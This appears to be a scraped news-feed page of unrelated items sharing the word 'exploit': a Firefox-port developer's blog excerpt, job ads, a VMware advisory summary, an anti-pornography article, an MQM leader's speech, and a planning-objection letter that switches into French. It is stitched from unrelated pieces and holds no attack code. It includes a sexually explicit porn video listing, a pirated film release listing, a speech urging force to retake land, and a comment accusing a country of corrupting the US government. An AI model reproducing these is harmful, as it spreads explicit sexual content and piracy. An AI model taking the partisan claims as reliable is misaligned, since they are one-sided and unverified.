    The first is modules (we do support classes, but not modules), introduced in Firefox 60. The metabug for this is incredibly intimidating and even the first "milestone 0" has a massive number of dependencies. The script loader changes could probably be implemented with some thought, but there is no way a single programmer working in his spare time can do the entire amount of work required and deal with all the potential regressions, especially when rebuilding JavaScript takes up to 20 minutes and rebuilding the browser takes several hours or more. The silver lining is that some sites may need refactoring to take advantage of modules, so wide adoption is not likely to occur in the near term until more frontend development tools start utilizing them.

    The second, unfortunately, is already being used now: async functions, introduced in Firefox 52, and really co-routines by any other name. The work to support them in the parser is not trivial but I've mostly completed it, and some of that code is (silently) in FPR10. Unfortunately, the await keyword works in terms of ES6 Promises, which we definitely do not support (we only have support for DOM Promises, which are not really interchangeable at the code level), and which extend hooks into the browser event loop to enable them to run asynchronously. You can see the large number of needed changes and dependencies in that Github issue as well as the various changes and regressions that resulted. This problem is higher priority because the feature is tempting to developers and some sites already make use of them (you usually see an odd syntax error and stuff doesn't load in those situations); the code changes needed to convert a function to asynchronous operation are relatively minor while yielding (ahem) a potentially large benefit in terms of perceived speed and responsiveness. However, there is no good way to make this work without ES6 Promise, and the necessary parser changes may cause code to run that can never run correctly even if the browser accepts it.

    I don't have good solutions for these looming problems but I'll try to continue making progress on what I know I can fix or implement and we'll examine what this means for feature parity as time progresses. Meanwhile, please try out the beta and post your comments, and expect FPR10 final later this month.


              BCEJP00017403 - Senior Security Analyst - Modis Canada - Montréal, QC
    Senior Security Analyst Ensures the planning, design, construction and operation of the networks of the multi-billion-dollar company...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
              New VMSA-2018-0025 and Intel Graphics Driver Unified Shader Compiler Security Updates

    Today, VMware has released the following new security advisory: VMSA-2018-0025 – VMware ESXi, Workstation, and Fusion workarounds address a denial-of-service vulnerability. This documents an important severity denial-of-service vulnerability that affects VMware ESXi, Workstation and Fusion. This issue arises due to an infinite loop in the 3D-rendering shader. Successfully exploiting this issue may allow an attacker […]

    The post New VMSA-2018-0025 and Intel Graphics Driver Unified Shader Compiler Security Updates appeared first on VMware Security & Compliance Blog.


              Systems Maintenance Technician and Trainer - Leidos - Virginia Beach, VA
    Recent Operational experience in Ships Signals Exploitation Space (SSES) aboard CG, DDG, or LPD class ships....
    From Leidos - Thu, 04 Oct 2018 17:07:40 GMT - View all Virginia Beach, VA jobs
              Pharmacy Technical Assistant - Part Time - Pharmaprix - Montréal, QC
    Location: 4999 Chemin Queen Mary, Arr. Cdn / Ndg, Montreal, Québec, H3W 1X4 Join a store that is locally owned and operated by...
    From Shoppers Drug Mart / Pharmaprix - Tue, 09 Oct 2018 21:32:10 GMT - View all Montréal, QC jobs
              Mega Porn Company Targeting Your Youngsters Through Video Games

    Porn is now making major inroads into two areas that will tighten its grip even more: online gaming and virtual reality.

    According to Ben Miller, Digital Strategies Coordinator for the National Center on Sexual Exploitation (NCOSE), even as recently as 2013, the number of video games containing pornographic sexual violence was minimal. But those numbers are now skyrocketing.

    One popular video game website hosted about 780 games with nudity in 2017, but in 2018 they now host over 1,600 such games.

    Now, a company that owns a large number of top porn sites and studios has started a distribution platform for online pornographic games.

    Miller said, "Porn games don't simply contain sex and nudity. Rather, they are much more graphic. Some of these games promote sexual harassment and assault. Despite being cartoons, the graphic content in these games is far from harmless. Animated porn fuels sexual addiction and shapes sexual palates just as regular porn does."

    Alarmingly, the distributor provides free-to-play games in addition to their purchased products. This free option will allow young kids easier access to the content, bypassing paywalls intended to block children's ability to play the games.

    NCOSE noted that the provider's website traffic has exploded from 50 million to 115 million visits between April and August 2018, ranking it in the top 500 websites in the world.

    Parents need to be aware of the impact the increase in pornographic online gaming may have on their children.

    Marriage and Family Therapist Dr. Jill Manning told Internet Security 101, "Parents need to understand how intricately linked the gaming industry and pornography industry are. More and more games have pornography embedded in them. If kids play online, that is a pornographer's heyday for marketing, grooming and hooking young consumers."

    Virtual Reality (VR) Is Also Booming

    Another major adult gaming portal announced in May that it is expanding into virtual reality with two new VR products. Through the use of a headset such as the Oculus Rift (owned by Facebook), a viewer is able to enter a totally manufactured environment and tune out the reality of their actual situation.

    Fortune magazine stated, "By 2025, adult virtual reality content is forecast to be a $1 billion business, the third biggest sector behind video games and NFL-related content, according to Piper Jaffray analyst Travis Jakel."

    Todd Glider, CEO of VR adult entertainment company BaDoink, clearly stated that "VR will become the standard in the industry for today's younger male consumers."

    He continued, "I see it through a generational lens. VR porn will not have a pronounced effect on the demographic born before 1980. However, for the generations born after, the ones that reach adulthood in a world where 24/7 access to adult content is just a mouse click away, that's the audience for VR porn, and it will be huge."

    Josh McDowell's VR Experience

    Christian apologist and evangelist Josh McDowell, is featured in the Conquer Series, a powerful cinematic DVD course that is helping families deal with pornography. In the Conquer Series McDowell describes his experience with virtual reality. He asked to have a villa created. When he put on the headset, he was amazed at the total immersion experience and felt he was actually in the villa.

    "And then it hit me," McDowell said. "What this would do with pornography, and nobody's talking about it. Like one pornographer said, 'It's been our dream as pornographers for 100 years'. It'll take pornography from here, right through the ceiling. It'll make everything I've said about pornography, or anyone else [has said] over the last eight years, child's play."

    McDowell added, "Is the church ready for this? No! Because the church is not aware of it. I can hardly find anyone that understands virtual reality in the church. Pastors or anything. I mean, you say, 'Well, do you know what Oculus Rift is?' It's like they're in wooly-wooly land. The church is not ready for it, and we don't have long. It's already mainlined in the world. When it becomes mainlined in the church it's a hundred times harder to equip people for it."

    The Threat Is Real; Protect Your Children

    The pornography industry has no intentions of backing off or slowing down in its quest to continually find more distribution pathways. Parents must be diligent in their efforts to protect their children from the onslaught of porn.

    Viewing virtual reality requires wearing a headset, which most children probably couldn't afford. But the free-to-play online games are easy to access and can be done more secretly.

    Here are some steps you can take to protect your children.

    1. Keep the gaming device or computer in a high-traffic area, not in the child's room, even if you already have an internet filter service.
    2. Remove the headphones and make them use the computer's speakers so you can hear any online chatting.
    3. Set up all of your children's game accounts and console controls. You decide who has access to their gaming profile and whom your child can talk to. Learn how to use the parental controls that are built into the console.
    4. Read reviews and understand the industry rating system. Make sure the game is age-appropriate.
    5. Talk to your children. Teach them basic internet safety rules and to notify you if they encounter anything unusual or unsettling while they are playing. Build a non-shaming relationship with your child so that if they do come across adult content, they can approach you and talk about it.

    Prepare Your Family

    The global porn epidemic touches all of our lives. Perhaps you struggle with pornography and want to break free of its hold on you. Or maybe you want to learn more about the problem so you can be better prepared to protect your family.

    The 12-DVD Conquer Series was created to give men a proven resource to help them achieve a porn-free life. The powerful video segments, compelling testimonies and strong biblical teaching will equip you with valuable information about the porn battle.

    Find out more at ConquerSeries.com


              442317-2018: Norway-Sandvika: Motorway operation services
    Publication date: 10/10/2018 | Deadline: | Document: Contract award notice
              Won't accept Pak's double standard of justice: MQM chief

    [United Kingdom], Oct 10, (ANI): Muttahida Qaumi Movement (MQM) founder and leader Altaf Hussain on Wednesday vowed to rebuild a new state for Mohajir people who have allegedly been denied equal rights and justice by Pakistan from the past several decades.

    Speaking at his 65th anniversary here, Hussain said, "Justice system in Pakistan is of dual standard, which is unacceptable. We would either accept a fully autonomous and powerful province for Mohajirs or a complete new Mohajir State. We won't accept anything less than either of these options."

    The MQM founder discussed in detail the prevailing anti-Mohajir and anti-Baloch policies of the state of Pakistan and asked, "What would be the exact feelings on seeing others occupying the house on gun points, exploiting all resources on the basis of power and influence? This is the typical situation that calls for use of power to retrieve the stolen rights. The oppressors would never listen to us unless we use the same strategy, say the use of power to repel them out of our lands."

    Elaborating on the ongoing issue, Hussain added, "This is the typical situation that calls for use of power to retrieve the stolen rights. The oppressors would never listen to us unless we use the same strategy, say the use of power to repel them out of our lands."

    The MQM founder further said that he has been questioned as to why he had slammed Pakistan ignoring that his people have been kidnapped and enforced to disappear and are extra-judicially murdered and these things are enough to upset any sensible mind. When Mohajir women visited Martyrs' monument at Azizabad, they were subjected to torture and arrest and even minor children were also not spared, he noted.

    "Mohajirs' ancestors created Pakistan but today their offspring are denied their just equal rights and are treated as slaves. Mohajirs had laid 2 million lives for the creation of Pakistan but the armed forces of the country had slaughtered more than 22,000 Mohajirs during special crackdowns. Not only this but a senescent leader of the Movement, a 70-year old academician Prof. Dr Hassan Zafar Arif was picked and murdered by the armed forces of the country on Jan 13, 2018, forgetting his role in educating millions in Pakistan. Are the armed forces and law enforcers for peoples' protection or butchering them? Will they be saluted or slammed?" he questioned.

    Stressing on the inequality faced by Mohajirs, Hussain said when Pakistan Muslim League-Nawaz (PML-N) President Shehbaz Sharif was produced in the court of law, his party workers were possessing armoured personnel carrier, but the police did not book them for any offence. "But when the women journalists belonging to Mohajir community entered an office of a Pakistani private television company asking them to be unbiased in reporting, the paramilitary Rangers and Police tortured them and later lodged them in jail. The Rangers had also killed one of the youngest workers of the movement."

    "Tehreek-e Labbaik had attacked media houses, police stations and public property but they were felicitated with cash prizes while MQM women were subjected to torture and straight fire. Why this double standard? The Chief Justice of Pakistan ignored Khadim Hussain Rizvi who openly called names to him but on the contrary, the CJP awarded sentences to other political leaders in the garb of contempt to court."

    Hussain continued, "Not only that, the Creator of Pakistan's nuclear programme and the atomic bomb, Dr Abdul Qadeer Khan was also a Mohajir but was humiliated and the entire credit was given to a Punjabi Scientist Dr. Samar Mund. Was that not sheer bias against the Mohajir Nation? We won't accept this double standard of justice, denied of justice. The state institutions are not willing or ready to listen to us and are taking all measures to eliminate us. Either we would accept a fully autonomous and powerful province or we would fight for independent Mohajir State."

    The MQM leader also touched upon the issues of the Baloch community and said, "Pakistan's army is butchering the innocent Baloch youths because they are demanding equal rights. The army is killing them after declaring them as terrorists. Army has to roll back their plans and they would have to free Balochistan and we are the supporters of free and independent Balochistan."

    While addressing the people of Punjab, he asked them to take to streets for supporting Baloch and Mohajirs in their fight for equality and human rights. Hussain also clarified that he had never slammed Pakistan but had slammed its corrupt and butchering feudal system. "Pakistan should be free from the decayed feudal system, corrupt Capitalist system and that everyone in Pakistan should have equal rights and equal citizens. The minorities in Pakistan, especially the Ahmedi, should also be respected with regard to their rights and religious freedom as Pakistani citizens."

    Hussain also talked about the judicial system of Pakistan and said, "It is beyond reasoning that the apex court of Pakistan has declared Nawaz Sharif as most dishonest person but, on the other hand has held Imran Khan Niazi, the Prime Minister of Pakistan as most honest person ignoring the fact that the court of Los Angeles had already declared him as fornicator, a biological father of a girl child he reproduced out of marriage."

    "Everything in Pakistan is done either by Pakistan's army or on its dictation and no institutions in Pakistan including the judiciary is free from the clutches of the army. What the courts in Pakistan are doing is only done on army's behest and dictation," he added.

    Hussain also alleged that courts in Pakistan declare anyone as a traitor if instructed to do so by the Army. "The country is under siege," he added. (ANI)


              IT Intern – mining operations technologies - Rio Tinto - Havre-Saint-Pierre, QC
    They are found everywhere, from smartphones to airplanes and cars, by way of hospitals and homes....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT - View all Havre-Saint-Pierre, QC jobs
              Letter to the Inquiry Commissioner regarding the Vulbens Local Urban Development Plan

    (For your information, below is a letter I am sending to the inquiry commissioner regarding the Vulbens PLU. A PLU that threatens the quality of planning across the whole Genevois. A PLU that threatens the quality of life and the budgetary balance of the municipality. It is up to the inhabitants of Vulbens to preserve their village, their quality of life, their mobility... and the municipal finances, in the face of landowners who have clearly managed to defend their property interests.)

    You can listen to a piece on the subject:

    https://www.radiolac.ch/actualite/cest-contraire-aux-engagements-de-reduction-du-trafic/


    Dear Inquiry Commissioner,

    It is rare for a local elected official of a neighbouring municipality to intervene as a citizen in a public inquiry. The rare times it happens, it is to support a general interest that is otherwise contested. To my knowledge, this letter is quite exceptional. Its purpose is to denounce forcefully the most scandalous excesses of the Local Urban Development Plan (PLU) adopted by the municipality of Vulbens. This letter cannot, however, list them all.

    A Local Urban Development Plan, as its name indicates, has the purpose of planning urbanisation locally. It is a major planning act for a municipality. It commits the municipality and its inhabitants for future generations. Its main purpose is to define where and how a municipality should develop. Managing the property interests of a few families is a matter for a wealth management adviser or a bank, but certainly not for a PLU. So I was astounded to learn from the elected officials of Vulbens that, before any work on the PLU, they had brought the landowners together so that they could set out their wishes and their projects. I was appalled to learn, following the planning committee of the inter-municipal body, that the owners' wishes had guided the drafting of the Local Urban Development Plan. I was surprised to note the planning inconsistencies, with agricultural parcels close to the village centre and, at the opposite end, parcels currently farmed that have become buildable. Dumbfounded to hear the explanation given by the elected officials to justify these inconsistencies, according to which the owners of the parcels to be developed have short-term projects while the owners of the agricultural parcels near the village centre do not. How can that guide planning decisions whose implementation should normally be spread over some ten years?

    The Territorial Coherence Scheme, like the State services, defines the extensions precisely. The Territorial Coherence Scheme sets the extensions permitted to the municipality of Vulbens at 5 hectares: that was already an exception for a village. Unilaterally, the municipality is extending over nearly 14 hectares.

    I wish to draw your attention to the consequences of such a PLU, beyond the major destruction of the quality of life of the inhabitants of Vulbens for the benefit of the property interests of a few families.

    Since the elected officials of Vulbens have verified that the landowners have short-term projects, the extensions will very soon allow the construction of 600 dwellings and therefore the arrival of 1200 additional inhabitants. The unprecedented land-retention rates used by the municipality of Vulbens lead, when calculated properly, to 600 additional dwellings and not 600 inhabitants as the municipality claims. To this must be added the densification of the areas already built, which according to various estimates will allow the construction of 1000 to 2000 additional dwellings. For the credibility of the demonstration, we will retain the low hypothesis of 1000 dwellings and therefore 2000 inhabitants. Between extension and urban densification, with such a PLU the municipality of Vulbens would therefore take in 3200 additional inhabitants and triple in size within a few years! A reality far removed from what is put forward in the Local Urban Development Plan.

    From the point of view of mobility, at an average of 4 trips per inhabitant, that represents 12800 additional trips on roads that are already saturated. Public transport service will never be possible because of the distance of Vulbens from urban centres, which leads to operating deficits unaffordable for public budgets. What will remain is essentially individual motorised travel. As a reminder, the neighbouring French and Swiss municipalities are committed to a memorandum of understanding aimed at reducing traffic at the small customs crossings. The delirious urbanisation of Vulbens would lead to the failure of this action plan, which would inevitably lead to the closure of those crossings to the detriment of the general interest. The inhabitants of St Julien would bear much of the nuisance of these additional vehicle flows, even as the municipality has just made a major investment of 22 million euros to facilitate access to the town.

    3200 additional inhabitants also means about 380 additional children in the primary schools, which are the municipality's responsibility (a ratio of 12% of inhabitants). That is 15 classrooms to build at 400,000 euros each, i.e. an investment budget of 6 million euros, far exceeding the capacity of a municipality that is already in debt. To this should be added operating expenses of 1500 euros per pupil per year, i.e. nearly 600,000 euros per year, well beyond the families' contributions to the municipal budget. While a few landowners would laugh out loud on the way to the bank, the municipality's taxpayers would have to bear dizzying tax increases to meet the public costs of delirious population growth. This demonstration of the saturation of school facilities due to absurd urban growth can be replicated for all public facilities: water, sanitation, secondary schools, high schools, hospitals, justice and police… A study carried out within the framework of the agglomeration project indicates that a municipality's financial balance can be maintained with controlled population growth of up to 2 to 3% per year, i.e. about 20 dwellings per year for Vulbens. The proposed PLU, even if spread over 10 years, would lead to population growth of 21% per year!

    La commune argumente ses décisions en raison des prétendus « coups partis » de permis d’aménager qu’elle a accordé récemment de manière très opportune pour les propriétaires fonciers concernés. Il faut une sacré mauvaise foi pour ne pas utiliser le sursis à statuer en accordant des permis manifestement contraire aux documents d’aménagement et se fonder sur l’argument des coups qu’on a laissé partir pour justifier des dérives d’un Plan Local d’Urbanisme dans une procédure d’enquête publique. Par ailleurs, j’attire votre attention sur le fait que la loi ne garantit nullement des droits à bâtir au pétitionnaire d’un permis d’aménager, même lorsque les travaux sont en cours. Les coups partis peuvent et doivent être stoppés. Il est encore temps de cesser le massacre.

    Vous pourrez connaitre précisément les noms des propriétaires fonciers bénéficiaires de ces extensions outrancières. Vous pourrez alors rapprocher ces noms des noms de familles des élus qui ont voté la délibération. Le cas échéant, si vous constatiez des prises illégales d’intérêts lors du vote des délibérations, conformément à l’article 40 du code pénal, vous auriez le devoir d’en informer le procureur de la république afin qu’il puisse, si nécessaire, donner les suites pénales prévues par la loi. Les citoyens qui n’ont pas un accès aisé au registre des propriétaires comptent sur votre vigilance.

    Ce courrier n’a pas pour objet de vous convaincre d’émettre un avis défavorable. Les avis défavorables et unanimes de l’Etat, de la communauté de communes et de la Chambre d’Agriculture, tout à fait exceptionnel tant par leur nature que leur force, aussi bien que la simple lecture du PLU doivent déjà vous conduire à émettre un avis défavorable. Cette lettre ne modifiera probablement pas la nature de votre avis, mais je vous écris pour vous recommander d’émettre votre avis avec force. En effet, je vous écris surtout pour vous alerter sur la profonde conviction que la commune ignorera tous les avis défavorables : les enjeux financiers sont trop importants pour que les intérêts patrimoniaux exprimés avant la démarche de PLU ne cèdent face à de simples avis défavorables qui ne sont que consultatifs. La loi autorise la commune à adopter ce scandaleux PLU malgré tous les avis défavorables. Inévitablement de multiples recours seront introduits. Cependant, les délais de jugement du tribunal administratif permettront aux propriétaires de faire leurs plus-values et aux promoteurs de faire leur œuvre pendant que l’équipe municipale aura le temps de terminer son mandat. Les habitants de Vulbens et des communes environnantes devraient alors en subir les conséquences pour les décennies à venir et les générations futures. En effet, la commune de Vulbens s’est déjà illustrée dans sa capacité à refuser les règles communes lors du transfert de la compétence Eau à la communauté de communes puisqu’elle avait refusé de transmettre les comptes publics de son budget annexe eau, qui avait déjà révélés quelques désagréables surprises a posteriori.

    Ce Plan Local d’Urbanisme ridiculiserait tout le Genevois français tant il contreviendrait aux engagements collectifs pris dans le cadre du projet d’agglomération du Grand Genève de maitrise du mitage du territoire et traduits dans les Schémas de Cohérence Territoriale. Quelle crédibilité auront nous si une municipalité peut s’affranchir de respecter les lois et règlements qui l’obligent à se mettre en conformité avec le SCOT dans un délai de trois ans qui suit son adoption ? La perception des citoyens qui constateraient que l’aménagement du territoire de cette agglomération aurait été dicté par des intérêts fonciers plutôt que l’intérêt général comme si nous étions encore au siècle passé, rejaillirai sur l’ensemble des élus du Genevois et discréditerai un peu plus la crédibilité des institutions publiques qui auront laissé faire, y compris le tribunal administratif qui vous a nommé. Il fut un temps où les propriétaires fonciers veillaient à être bien représentés à la table du conseil pour faire valoir leurs intérêts. On n’y parlait pas d’aménagement lorsqu’on débattait du PLU, mais on y jouait à « qui veut gagner des millions ? ». Ce temps est révolu. Selon les conclusions de votre enquête il doit l’être définitivement.

    Peut-être que la crainte de poursuites pénales à l’encontre des conseillers municipaux qui se rendront coupables de prise illégale d’intérêt pourrait dissuader certains d’approuver le document en l’état, voir même de retirer la délibération d’arrêt du PLU. Un jugement extrêmement rapide et en urgence du tribunal administratif sur un éventuel recours serait indispensable avant que le mal ne soit fait de manière irréparable, mais il vous revient d’en alerter le tribunal administratif pour que le cas échéant il fixe en urgence une date d’audience. Il me semble toutefois utile d’attirer votre attention sur le fait qu’un simple avis défavorable ne suffira pas à bloquer ce scandaleux PLU. Le plus sûr étant que les habitants de Vulbens eux même se révoltent contre un projet de dégradation aussi manifeste de leur cadre de vie et des finances communales. Cependant, les termes absconds des PLU conduisent trop souvent les habitants à n’en comprendre les enjeux que lors des dépôts des permis de construire, lorsque c’est trop tard.

    Je me tiens à votre disposition pour tout renseignement complémentaire. Je vous prie de croire, Monsieur le Commissaire Enquêteur, à l’expression de ma profonde considération.

     

    Antoine Vielliard

     

    Avis défavorable de l’Etat : http://www.vulbens.fr/files/plu_vulbens_avis_etat.pdf

    Avis défavorable unanime du bureau de la communauté de communes : http://www.vulbens.fr/files/plu_vulbens_avis_ccg.pdf

    Avis défavorable de la Chambre d’Agriculture : http://www.vulbens.fr/files/plu_vulbens_avis_chambre_dagriculture.pdf


              442317-2018: Norway-Sandvika: Motorway operation services
    Publication date: 10/10/2018 | Deadline: | Document: Contract award notice
              Apple releases iOS 12.0.1 to fix several bugs
    To patch several bugs discovered in iOS 12, Apple is offering a new version of its mobile operating system. It is iOS version 12.0.1, which fixes Wi-Fi access problems and problems with ... Continue reading
              Hacker penetrates Spankchain smart contract, escapes with booty
    A hacker exploited a re-entrancy bug in the Spankchain payment channel contract.
              The Novel of Ferrara [electronic resource] by Bassani, Giorgio.
    -- The Novel of FerraraWithin the WallsSet in the northern Italian town of Ferrara before, during, and after the Second World War, these interlocking stories present a fully rounded world of unforgettable characters: the respected doctor whose homosexuality is tolerated until he is humiliatingly exposed by an exploitative youth; a survivor of the Nazi death camps whose neighbors’ celebration of his return gradually turns to ostracism; a young man discovering the ugly, treacherous price that peop
              Developing: 123 Missing Kids Rescued In Historic Wayne County Child Sex Slave Raids


    By Brandon Hall
    (Email Him At WestMIPolitics@Gmail.com)

    123 missing kids have been rescued in Wayne County after a historic law enforcement sweep involving raids from multiple agencies at the federal, state, and local level.

    Many of the victims are believed to have been used as sex slaves in human trafficking operations.

    More details are expected in the weeks and months ahead... 

    According to the Detroit Free Press:

    "A one-day sweep by multiple law enforcement agencies in Wayne County resulted in the recovery of 123 missing children, according to the U.S. Marshals Service.

    The sweep, dubbed Operation MISafeKid and conducted on Sept. 26, involved the Detroit Missing Child Recovery Unit of the U.S. Marshals Sex Offender Investigations Branch coordinated with the National Center for Missing and Exploited Children, the U.S. Department of Housing and Urban Development — Office of Inspector General, Michigan State Police and law enforcement officers from other Wayne County agencies.

    The effort in particular was aimed at locating victims of sex trafficking.

    During the one-day operation, out of 301 case files, 123 children were identified and recovered safely. "Three cases were identified as being possible sex trafficking cases, and one homeless teen was transported back to the command post after it was discovered that he had not had anything to eat in three days. He was then debriefed and turned over to Child Protective Services for aftercare," the U.S. Marshals Service said in a news release." 
    _________________________________________________________________

    Brandon Hall is a lifelong political nerd from Grand Haven, and is the Managing Editor of West Michigan Politics.

    >>>Email him at WestMIPolitics@Gmail.com

              EPL: Hazard will leave Chelsea for Real Madrid on one condition – Mark Hughes
    Southampton boss, Mark Hughes has revealed that Chelsea ace, Eden Hazard will leave Stamford Bridge for Real Madrid on one condition. Hazard has been heavily linked with a move to join the La Liga giants following his exploits at the 2018 FIFA World Cup in Russia. Hughes, a former Chelsea striker, said that Hazard will […]
              Comment on Ocasio-Cortez and other new Dems ‘need to be educated’ on Israel, says Rep. Eliot Engel by US Citizen
    Of course there is another country that has interfered in U.S. elections, has endangered Americans living or working overseas and has corrupted America’s legislative and executive branches. It has exploited that corruption to initiate legislation favorable to itself, has promoted unnecessary and unwinnable wars and has stolen American technology and military secrets. Its ready access to the mainstream media to spread its own propaganda provides it with cover for its actions and it accomplishes all that and more through the agency of a powerful and well-funded domestic lobby that oddly is not subject to the accountability afforded by the Foreign Agents Registration Act (FARA) of 1938 even though it manifestly works on behalf of a foreign government. That country is, of course, Israel. http://mondoweiss.net/2016/08/about-russian-influence https://consortiumnews.com/2017/04/20/why-not-a-probe-of-israel-gate us_politics_than_russia_20170427 http://www.awdnews.com/political/assange-forget-russia-,-the-real-threat-to-america-comes-from-israel-and-the-israel-lobby https://www.counterpunch.org/2018/09/03/the-truths-that-wont-be-told-how-israel-spies-on-us-citizens/
              Machinist - Groupe SFP ressources humaines - Fermont, QC
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* is the world's number one steel and mining company and has more than 220,000 employees... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              The Equalizer 2 2018 NEW HDTS x264 AC3-MP4KiNG

    Language: English
    956.87 MB | 01:55:02 | 1032 Kbps | AVC | 720x344 | AC3, 48 Khz, 2 channels, 128 Kbps
    Genre: Action | Crime | Thriller

    Provider: Lori.Yagami


    Robert McCall serves an unflinching justice for the exploited and oppressed, but how far will he go when that is someone he loves?


              Director of Operations - administrative services - Boys and Girls Club of Yukon - Whitehorse, YT
    Languages English Education Bachelor's degree Experience 5 years or more Specific skills Hire, train or delegate the training of staff; Do... $37,000 - $42,250 a year
    From Guichet emplois - Wed, 19 Sep 2018 04:47:53 GMT - View all Whitehorse, YT jobs
              Re: Helping girlfriend (full-time teacher) with retirement options: 401k, 403b, 457?
    MortgageOnBlack wrote:
    Mon Feb 12, 2018 11:04 am

    My current impression is that the 403b should be completely avoided unless she is able to max out the 401k/457 and IRA. I felt very suspicious of her 403b when I realized a salesguy was involved.


    Your instinct about the exploitative 403b/457b sales reps is 100% accurate, actually you may even be underestimating it, but by avoiding the 403b you'd also be avoiding the best (least expensive) option.



    I'm enrolled in Security Benefit's NEA DirectInvest 403b and I have a fully diversified portfolio of Vanguard index funds that cost roughly 0.063% per year plus a $35 yearly fee that is waived when I hit 50k. I documented the plan here. I documented the process we went through to enroll here.



    If Krow's information on the PERA Plus plan is accurate, and I have every reason to believe it is, then it is clearly more expensive. I suppose that expense could be justified to purchase a target date fund as opposed to the 3 fund portfolio available in the NEA DirectInvest plan.



    I agree with the notion that an IRA is preferable to every option if the investor can't exceed $5,500/year in contributions.



    On a side note, AXA is absolutely terrible. I documented their plan here. Run.
              A claim for damages based on the illegality of a Cnac decision cannot be appealed
    According to the cour administrative de Marseille, the administrative courts of appeal rule at first and last instance on claims for damages based on the illegality of commercial development decisions taken by the Cnac.
              Police Raid Thai Playboy Caveman’s Home After Going Viral for Seducing Western Women

    A popular “caveman” in Thailand became the subject of an investigation by local police after his exploits with numerous Western female tourists went viral on social media. Before gaining internet notoriety, 48-year-old Chatupoom Losiri was a minor online personality who is known for living in a cave on the Full Moon Party island of Koh...

    The post Police Raid Thai Playboy Caveman’s Home After Going Viral for Seducing Western Women appeared first on NextShark.


              Watch Taron Egerton and Jamie Foxx in new Robin Hood trailer
    Robin (Egerton), a war-hardened Crusader, and his Moorish commander (Foxx) mount an audacious revolt against the corrupt English crown in a thrilling action-adventure packed with gritty battlefield exploits, mind-blowing fight choreography, and a timeless romance.
              Comment on Iowa Rally Chants “Lock Her Up” After Trump Taunts Diane Feinstein by Jean Lafitte (@loupgarous)
    Once again, the President's his own worst enemy at these rallies and on Twitter by dropping to the level of his detractors. I understand *why* he does it - it's got to be frustrating to have your enemies exploit a captive electronic media and film celebrities against you. But it's a losing game. You can't out-fart a skunk.
              Store Director (M/F)
    We are looking for a store director to join our Marseille store, with mobility across the Grand Sud Est. If you recognise yourself in this portrait... You are ready to take on responsibility for one of our stores. You lead your management team, made up of department heads, and coach them with ambition, recognition and high standards. Passionate about the home universe (whether you are a fine gourmet or a hearty eater, creative or resourceful, anything is possible...), you define and implement your commercial strategy and take part in the evolution of our product strategy (you are ready to take risks and are not afraid of failure!). You instil a strong results culture and manage your profit and loss account in close collaboration with your management committee (meaning and teaching are your watchwords!). A retailer at heart, you embody listening to the customer and know how to involve your team so that this has full meaning in the store. Bold, you actively contribute to innovation in creative home retail in an "at home" spirit and rally your team around this company project
              Windows 10 Home: Microsoft raises its pricing by 40%

    Strange as it may seem, Microsoft has adjusted the price of the Windows 10 Home licence. This operating system is now offered at 139 dollars on its online store. Microsoft has decided to increase the pricing of its Windows 10 Home operating system substantially. Quietly, its price ...

    The post "Windows 10 Home, Microsoft augmente sa tarification de 40%" appeared first on GinjFo.


              442265-2018: Italy-Cavenago di Brianza: Landfill operation
    Publication date: 10/10/2018 | Deadline: | Document: Contract award notice
              441159-2018: Denmark-Vordingborg: Mining equipment, quarrying equipment, construction equipment
    Publication date: 10/10/2018 | Deadline: | Document: Contract award notice
              Anomali Publishes Cybersecurity Report on DAX-100 Germany Companies
    New Report from Anomali Labs Analyses State of Cybersecurity Across Largest German Enterprises NUREMBERG, Germany, Oct. 10, 2018 (GLOBE NEWSWIRE) — Anomali today announced at the IT-SA Security Expo and Congress the release of the 2018 DAX 100 cybersecurity profile report. This report represents the third consecutive year in which Anomali Labs has analyzed the state of cybersecurity for the DAX 100 companies, and details ongoing suspected cyber threat activity across German enterprises. The report, available for download, provides insights into five critical threat categories that could provide attackers with an exploitable opportunity to compromise DAX 100 enterprises and its […]
              Assistant – Operations, wind and solar energy | #ADM172 - innergex - Windthorst, SK
    JOB POSTING #ADM172 POSITION: ASSISTANT – OPERATIONS, WIND AND SOLAR ENERGY WINDTHORST, TEXAS (USA) COMPANY PROFILE Innergex Renewable Energy Inc. is a...
    From innergex - Thu, 04 Oct 2018 18:55:39 GMT - View all Windthorst, SK jobs
              BCEJP00017403 - Senior Security Analyst - Modis Canada - Montréal, QC
    Senior Security Analyst Ensures the planning, design, construction and operation of the networks of the company, worth several billion...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
              Sexy college girl craves a threesome. / Lyra Threeway - Exploited College Girls (2018) HD 720p
    Sexy college girl craves a threesome. / Lyra Threeway - Exploited College Girls (2018) HD 720p

    Description: When we last saw Lyra, we were impressed with her great attitude, sexiness and her delicious D cup tits. Now she’s back to take on two cocks at once and again she doesn’t disappoint! While she comes across as the slightly nerdy girl next door type, we know her better as the freaky Dead Head who loves getting fucked hard in all her holes. In fact, she refers to herself as a hippie whore and we couldn’t agree more! No matter what we threw at her, she came back asking for more with a sloppy smile that told us all we needed to know about her. She was excited for weeks leading up to her threesome debut and couldn’t wait to be filled up by our studs’ engorged cocks filling her up until she was squealing with pleasure.

              The Eden Hazard plan: Real Madrid ready to make move for Chelsea star
    Dubbed 'The Hazard Plan', Real Madrid hope to exploit the Belgian's contract situation in order to get him relatively cheaply - as they did with goalkeeper Thibaut Courtois.
              FMOS-FAPH/USTTB: Ginna Dogon honours the memory of Prof. Ogobara Doumbo (Other press)
    On the morning of Friday 28 September 2018, a stirring tribute was paid to the late Professor Ogobara Doumbo for his many achievements on behalf of Mali, Africa and the whole world. It was held at the initiative of the Ginna Dogon association in partnership with the Faculté de médecine et d'odontostomatologie (FMOS) and the Faculté de pharmacie (FAPH) of the Université des sciences, des techniques et des technologies de Bamako (USTTB). The Minister of Innovation and Scientific Research, [...]
              Deja Vu: The Gas Conflict Around Cyprus Is Getting Worse

    Via GEFIRA,

    In early October, the Cypriot government invited tenders for gas extraction in Block 7. Ankara believes that this step impairs the interests of both Turkey and the Turkish Cypriots and announced that remedial measures will be taken, which might entail an escalation of tensions in this region of the Mediterranean.

